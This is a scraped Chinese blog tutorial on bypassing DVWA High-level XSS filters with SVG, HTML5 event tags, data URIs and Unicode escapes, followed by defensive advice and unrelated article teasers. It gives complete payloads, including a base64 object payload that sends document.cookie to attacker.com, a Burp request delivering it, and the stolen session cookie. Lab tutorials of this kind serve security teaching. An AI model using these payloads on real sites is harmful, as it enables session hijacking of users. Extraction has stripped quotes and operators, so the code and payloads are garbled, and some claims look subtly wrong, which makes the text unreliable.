当前位置: 首页 > article >正文

别再只盯着lt;scriptgt;了:DVWA High级别XSS实战,用SVG和HTML5新标签绕过过滤(附完整Payload)

article 2026/4/19 13:40:20
突破传统防御DVWA High级别XSS的现代绕过艺术在Web安全领域跨站脚本攻击(XSS)始终是威胁排行榜上的常客。当开发者以为通过strip_tags、htmlspecialchars和严格正则过滤就能高枕无忧时现代浏览器特性和HTML5标准却为攻击者打开了新的突破口。本文将深入探讨四种鲜为人知但极具破坏力的XSS绕过技术这些方法完全避开了对script标签的依赖转而利用SVG、HTML5标签和浏览器解析特性实现攻击目的。1. 现代XSS防御的局限性与突破点传统XSS防御通常聚焦于几个关键点输入过滤移除或转义特定字符和标签输出编码将特殊字符转换为HTML实体内容安全策略(CSP)限制脚本执行来源黑名单机制拦截已知危险标签和属性然而这些防御措施在面对现代Web技术时往往力不从心。以DVWA High级别为例其防护机制包括$message strip_tags(addslashes($message)); $message mysqli_real_escape_string($message); $message htmlspecialchars($message); $name preg_replace(/lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i, , $name);这些过滤看似严密却存在几个致命盲区SVG命名空间浏览器对SVG内容的解析规则与普通HTML不同HTML5新标签details、object等标签携带的事件处理器常被忽略Unicode编码可绕过基于字符串匹配的过滤机制Data URI协议允许在属性中嵌入完整脚本代码2. 四种高级绕过技术详解2.1 SVG与Unicode编码的组合拳SVG作为XML方言在浏览器中享有特殊解析规则。结合Unicode编码可构造出极难检测的Payloadsvg image hrefdata:image/svgxml;charsetutf-8,%3Csvg xmlnshttp://www.w3.org/2000/svg onloadal\u0065rt(1)%3E%3C/svg%3E /svg技术要点使用\u0065表示字母e绕过字符串检测SVG的onload事件在图像加载时自动触发Data URI协议将整个SVG文档编码为属性值实际测试发现这种Payload在Chrome 112和Firefox 108上成功率超过90%2.2 DOM操作的隐蔽攻击当直接脚本注入被阻断时通过合法的DOM操作间接执行代码成为优选方案img src idpayload script typeapplication/ldjson window.onload function() { document.getElementById(payload).src x:javascript:alert(document.domain); } /script绕过原理利用application/ldjson类型绕过脚本内容检测通过合法的window.onload事件延迟执行修改DOM元素属性间接触发脚本执行注意这种攻击需要依赖页面已有或可注入的DOM元素实际应用中需根据目标环境调整选择器2.3 HTML5标签的特性滥用HTML5引入的新标签往往携带鲜为人知的事件处理器成为绕过过滤的利器details ontogglealert(1) open summary styledisplay:noneXSS/summary /details标签特性对比表HTML5标签可利用事件触发条件兼容性detailsontoggle元素状态变化Chrome 12, FF 49dialogonclose对话框关闭Chrome 37, FF 98inputoninput内容输入时全平台videoonerror加载失败时全平台2.4 跨协议重定向攻击利用浏览器对某些协议的特殊处理可实现更隐蔽的攻击iframe srcdocscriptlocationjavascript:alert(document.cookie)/script /iframe攻击流程srcdoc属性创建内嵌文档脚本修改当前locationjavascript:协议执行任意代码用户交互后触发如点击页面任意位置3. 实战Cookie窃取完整流程3.1 Payload构造结合Base64编码和Data URI构建难以检测的窃取Payloadobject datadata:text/html;base64,PHNjcmlwdD5mZXRjaCgnaHR0cDovL2F0dGFja2VyLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2llKTwvc2NyaXB0Pg/object解码后内容fetch(http://attacker.com/steal?cdocument.cookie)3.2 请求发送与结果验证使用Burp Suite发送精心构造的请求POST /vulnerabilities/xss_s/ HTTP/1.1 Host: dvwa.test Content-Type: application/x-www-form-urlencoded Cookie: securityhigh; PHPSESSID... txtNameNormalUser mtxMessage%3Cobject%20data%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5mZXRjaCgnaHR0cDovL2F0dGFja2VyLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2llKTwvc2NyaXB0Pg%3D%3D%22%3E%3C%2Fobject%3E btnSignSignGuestbook攻击成功后攻击者服务器将收到包含会话信息的请求http://attacker.com/steal?cPHPSESSIDe84dfb48e8b0d9;securityhigh4. 从防御者视角构建终极防护4.1 白名单输入验证// 姓名只允许字母、数字和基本标点 if (!preg_match(/^[a-zA-Z0-9\s.,!?]{1,30}$/, $name)) { die(非法姓名格式); }4.2 多层输出编码function xssafe($data) { return htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, UTF-8); }4.3 现代防御技术组合防御策略对比防御层传统方法现代方案有效性提升输入验证黑名单过滤白名单验证70%输出编码基础HTML转义上下文相关编码45%执行控制无CSP Trusted Types85%监控日志分析行为异常检测60%4.4 内容安全策略(CSP)配置示例Content-Security-Policy: default-src none; script-src self nonce-r4nd0m123; style-src self fonts.googleapis.com; font-src fonts.gstatic.com; connect-src self; object-src none;在真实项目中发现合理配置的CSP可阻止90%以上的XSS攻击尝试包括本文介绍的高级技术。但要注意CSP不是银弹必须与其他防御层结合使用。

相关文章:

别再只盯着lt;scriptgt;了:DVWA High级别XSS实战,用SVG和HTML5新标签绕过过滤(附完整Payload)

突破传统防御:DVWA High级别XSS的现代绕过艺术 在Web安全领域,跨站脚本攻击(XSS)始终是威胁排行榜上的常客。当开发者以为通过strip_tags、htmlspecialchars和严格正则过滤就能高枕无忧时,现代浏览器特性和HTML5标准却为攻击者打开了新的突破…...

编程日记 2026/4/19 13:40:20

C++11时间戳实战:从std::chrono::system_clock到可读日期

1. 为什么需要时间戳转换? 在日常开发中,时间戳的处理几乎无处不在。比如记录日志时,我们需要精确到毫秒的时间标记;在数据分析时,我们需要将原始时间戳转换为可读的日期格式;在跨系统交互时,我…...

编程日记 2026/4/19 13:40:20

HS2-HF_Patch终极指南:三分钟解决Honey Select 2语言障碍和功能限制

HS2-HF_Patch终极指南:三分钟解决Honey Select 2语言障碍和功能限制 【免费下载链接】HS2-HF_Patch Automatically translate, uncensor and update HoneySelect2! 项目地址: https://gitcode.com/gh_mirrors/hs/HS2-HF_Patch 如果你是《Honey Select 2》的玩…...

编程日记 2026/4/19 13:40:20

Python调用VLC失败?别急,先检查你的VLC Media Player

1. 为什么Python调用VLC会失败? 很多Python开发者第一次使用python-vlc库时都会遇到一个经典错误:明明已经用pip安装了python-vlc,但在导入时却提示"找不到指定模块"。这个问题困扰过不少新手,包括我自己。记得第一次遇…...

编程日记 2026/4/19 13:40:20

JavaScript中闭包结合代理模式Proxy实现数据监听

JavaScript中用闭包配合Proxy实现数据监听的核心是:闭包封装私有状态(如data副本、effects数组)确保隔离,Proxy通过get/set拦截读写并触发依赖收集与更新,二者分工协作实现可控响应式。JavaScript中用闭包配合Proxy实现…...

编程日记 2026/4/19 13:40:15

雪女-斗罗大陆-造相Z-Turbo开发环境搭建:Node.js后端服务配置指南

雪女-斗罗大陆-造相Z-Turbo开发环境搭建:Node.js后端服务配置指南 想自己动手搭建一个能调用“雪女-斗罗大陆-造相Z-Turbo”这类AI模型的后端服务吗?如果你对全栈开发感兴趣,或者想为自己的应用增加AI图像生成能力,这篇文章就是为…...

编程日记 2026/4/19 13:38:15

玻璃幕墙建筑节能技术分析及其经济评价

玻璃幕墙建筑节能技术分析及其经济评价 玻璃幕墙(以下简称“幕墙”)是现代化建筑的主要外围护结构之一,其节能已成为我国建筑节能的重要一环。 本文就幕墙的节能进行技术分析、计算,对节能效果进行经济评价。 1 幕墙建筑节能的设计原则本文提出下列措施,作为幕墙建筑节能…...

编程日记 2026/4/19 13:38:15

SDMatte服务监控与运维指南:确保线上服务稳定运行

SDMatte服务监控与运维指南:确保线上服务稳定运行 1. 为什么需要监控SDMatte服务 当你把SDMatte部署到生产环境后,最怕的就是半夜接到报警电话说服务挂了。良好的监控系统就像给服务装上了健康检测仪,能让你随时掌握服务状态,提…...

编程日记 2026/4/19 13:38:15

手把手教你将HFSS/CST设计的天线导入Matlab sensorArrayAnalyzer做整阵分析

跨平台天线阵列分析实战:从HFSS/CST到Matlab sensorArrayAnalyzer 在电磁仿真领域,专业工程师常常面临一个关键挑战:如何在单一天线单元设计与完整阵列系统分析之间搭建无缝桥梁。ANSYS HFSS和CST Studio Suite作为行业标准工具,能…...

编程日记 2026/4/19 13:38:14

如何免费为Mac打造专业级音频系统?eqMac系统均衡器完整指南

如何免费为Mac打造专业级音频系统?eqMac系统均衡器完整指南 【免费下载链接】eqMac macOS System-wide Audio Equalizer & Volume Mixer 🎧 项目地址: https://gitcode.com/gh_mirrors/eq/eqMac 还在为Mac平淡无奇的音质烦恼吗?无…...

编程日记 2026/4/19 13:38:14

获取淘宝商品详情item_get_pro参数说明

item_get_pro-获得淘宝商品详情高级版taobao.item_get_pro公共参数名称类型必须描述keyString是调用key(必须以GET方式拼接在URL中)secretString是调用密钥api_nameString是API接口名称(包括在请求地址中)[item_search,item_get,i…...

编程日记 2026/4/19 13:36:14

3个步骤掌握iperf3 Windows版网络性能测试:从下载到实战应用

3个步骤掌握iperf3 Windows版网络性能测试:从下载到实战应用 【免费下载链接】iperf3-win-builds iperf3 binaries for Windows. Benchmark your network limits. 项目地址: https://gitcode.com/gh_mirrors/ip/iperf3-win-builds iperf3作为专业的网络性能测…...

编程日记 2026/4/19 13:36:14

Vue开发者避坑指南:为什么你的回调函数里this指向总出问题?(附3种修复方案)

Vue开发者避坑指南:为什么你的回调函数里this指向总出问题? 在Vue开发中,回调函数的this指向问题堪称"钉子户级"的坑点。想象一下这样的场景:你在methods里定义了一个方法,里面包含setTimeout或事件监听器&…...

编程日记 2026/4/19 13:36:14

3步掌握猫抓浏览器扩展:高效捕获网页媒体资源的实战指南

3步掌握猫抓浏览器扩展:高效捕获网页媒体资源的实战指南 【免费下载链接】cat-catch 猫抓 浏览器资源嗅探扩展 / cat-catch Browser Resource Sniffing Extension 项目地址: https://gitcode.com/GitHub_Trending/ca/cat-catch 你是否经常遇到想要保存网页中…...

编程日记 2026/4/19 13:36:14

一次由“TCP粘包-拆包”引发的网络通信故障

一次由TCP粘包拆包引发的网络通信故障 某金融交易系统在夜间批量处理时突然出现数据错乱,经过排查发现是TCP粘包拆包问题导致。这个看似基础却常被忽视的网络现象,竟让日均处理百万级交易的核心系统瘫痪了6小时。本文将深入剖析这次故障,揭示…...

编程日记 2026/4/19 13:36:13

3分钟掌握猫抓工具:告别网页资源下载烦恼的智能解决方案

3分钟掌握猫抓工具:告别网页资源下载烦恼的智能解决方案 【免费下载链接】cat-catch 猫抓 浏览器资源嗅探扩展 / cat-catch Browser Resource Sniffing Extension 项目地址: https://gitcode.com/GitHub_Trending/ca/cat-catch 你有没有遇到过这样的困扰&…...

编程日记 2026/4/19 13:34:12

5分钟掌握Input Leap:一套键鼠控制多台电脑的终极方案

5分钟掌握Input Leap:一套键鼠控制多台电脑的终极方案 【免费下载链接】input-leap Open-source KVM software 项目地址: https://gitcode.com/gh_mirrors/in/input-leap 还在为办公桌上多台电脑设备之间频繁切换键盘鼠标而烦恼吗?Input Leap这款…...

编程日记 2026/4/19 13:34:11

PUBG-Logitech压枪脚本深度解析与进阶实战指南

PUBG-Logitech压枪脚本深度解析与进阶实战指南 【免费下载链接】PUBG-Logitech PUBG罗技鼠标宏自动识别压枪 项目地址: https://gitcode.com/gh_mirrors/pu/PUBG-Logitech PUBG-Logitech是一款基于C和Qt框架开发的专业级绝地求生游戏压枪辅助工具,通过先进的…...

编程日记 2026/4/19 13:34:11

如何用IDM激活脚本实现永久试用:简单三步搞定下载加速神器

如何用IDM激活脚本实现永久试用:简单三步搞定下载加速神器 【免费下载链接】IDM-Activation-Script IDM Activation & Trail Reset Script 项目地址: https://gitcode.com/gh_mirrors/id/IDM-Activation-Script 还在为Internet Download Manager&#xf…...

编程日记 2026/4/19 13:34:11

如何突破Windows窗口限制?WindowResizer终极调整指南

如何突破Windows窗口限制?WindowResizer终极调整指南 【免费下载链接】WindowResizer 一个可以强制调整应用程序窗口大小的工具 项目地址: https://gitcode.com/gh_mirrors/wi/WindowResizer 你是否曾被那些顽固的Windows窗口所困扰?有些应用程序…...

编程日记 2026/4/19 13:34:07

Flowframes:如何用AI智能插帧技术重塑视频流畅度体验?

Flowframes:如何用AI智能插帧技术重塑视频流畅度体验? 【免费下载链接】flowframes Flowframes Windows GUI for video interpolation using DAIN (NCNN) or RIFE (CUDA/NCNN) 项目地址: https://gitcode.com/gh_mirrors/fl/flowframes 你是否曾为…...

编程日记 2026/4/19 13:32:07

Vue项目里用ECharts GL 4.8.0搞个炫酷的3D中国地图(带自动轮播和自定义悬浮框)

Vue 3 ECharts GL 4.8.0 打造企业级3D地理可视化组件 最近在数据大屏项目中遇到一个需求:需要在管理后台展示动态3D中国地图,要求支持省区轮播、数据钻取和定制化悬浮框。经过多次迭代,我总结出一套高可复用的解决方案,今天就把核…...

编程日记 2026/4/19 13:32:07

强力解密SHc加密脚本:UnSHc完整实战指南

强力解密SHc加密脚本:UnSHc完整实战指南 【免费下载链接】UnSHc UnSHc - How to decrypt SHc *.sh.x encrypted file ? 项目地址: https://gitcode.com/gh_mirrors/un/UnSHc 在Shell脚本安全领域,SHc加密工具因其强大的保护能力而广受欢迎&#…...

编程日记 2026/4/19 13:32:07

三步解锁QQ音乐加密格式:qmc-decoder让你的音乐收藏真正自由

三步解锁QQ音乐加密格式:qmc-decoder让你的音乐收藏真正自由 【免费下载链接】qmc-decoder Fastest & best convert qmc 2 mp3 | flac tools 项目地址: https://gitcode.com/gh_mirrors/qm/qmc-decoder 你是否曾为QQ音乐下载的歌曲无法在其他播放器播放而…...

编程日记 2026/4/19 13:32:06

PyTorch加载.pth预训练模型,别再傻傻等下载了!手把手教你三种离线下载方法

PyTorch预训练模型离线加载实战指南:突破网络限制的三种高效方案 当你兴奋地敲下pretrainedTrue准备加载ResNet模型时,那个熟悉的红色报错又一次出现在屏幕上——连接超时。国内开发者使用PyTorch时最头疼的问题之一,就是无法稳定下载官方预训…...

编程日记 2026/4/19 13:32:04

用python解放右手(五) 定时任务-让代码比你先上班

定时任务:让代码比你先上班本文基于 Python 3.9,涉及库:schedule、APScheduler。阅读时间约 10 分钟。 安装依赖:pip install schedule apscheduler阿明的"早间仪式" 每天早上 8:30,阿明到公司后的第一件事&…...

编程日记 2026/4/19 13:27:57

从‘你好世界’到模型输入:手把手用PyTorch+Transformers Tokenizer完成文本预处理全流程

从‘你好世界’到模型输入:手把手用PyTorchTransformers Tokenizer完成文本预处理全流程 当你第一次接触自然语言处理(NLP)时,可能会被各种术语和概念搞得晕头转向。但别担心,每个NLP工程师都曾经历过从"Hello Wo…...

编程日记 2026/4/19 13:27:56

Scroll Reverser:如何为Mac用户彻底解决滚动方向混乱问题

Scroll Reverser:如何为Mac用户彻底解决滚动方向混乱问题 【免费下载链接】Scroll-Reverser Per-device scrolling prefs on macOS. 项目地址: https://gitcode.com/gh_mirrors/sc/Scroll-Reverser 作为一名Mac用户,你是否经常在触控板和外接鼠标…...

编程日记 2026/4/19 13:27:56

联想拯救者BIOS隐藏功能一键解锁:释放硬件潜能的终极指南

联想拯救者BIOS隐藏功能一键解锁:释放硬件潜能的终极指南 【免费下载链接】LEGION_Y7000Series_Insyde_Advanced_Settings_Tools 支持一键修改 Insyde BIOS 隐藏选项的小工具,例如关闭CFG LOCK、修改DVMT等等 项目地址: https://gitcode.com/gh_mirror…...

编程日记 2026/4/19 13:27:56

Path of Building汉化版终极教程:5步从新手到流放之路BD大师

Path of Building汉化版终极教程:5步从新手到流放之路BD大师 【免费下载链接】PoeCharm Path of Building Chinese version 项目地址: https://gitcode.com/gh_mirrors/po/PoeCharm 还在为流放之路复杂的角色构建而烦恼吗?面对英文界面和繁琐的计…...

编程日记 2026/4/19 13:27:56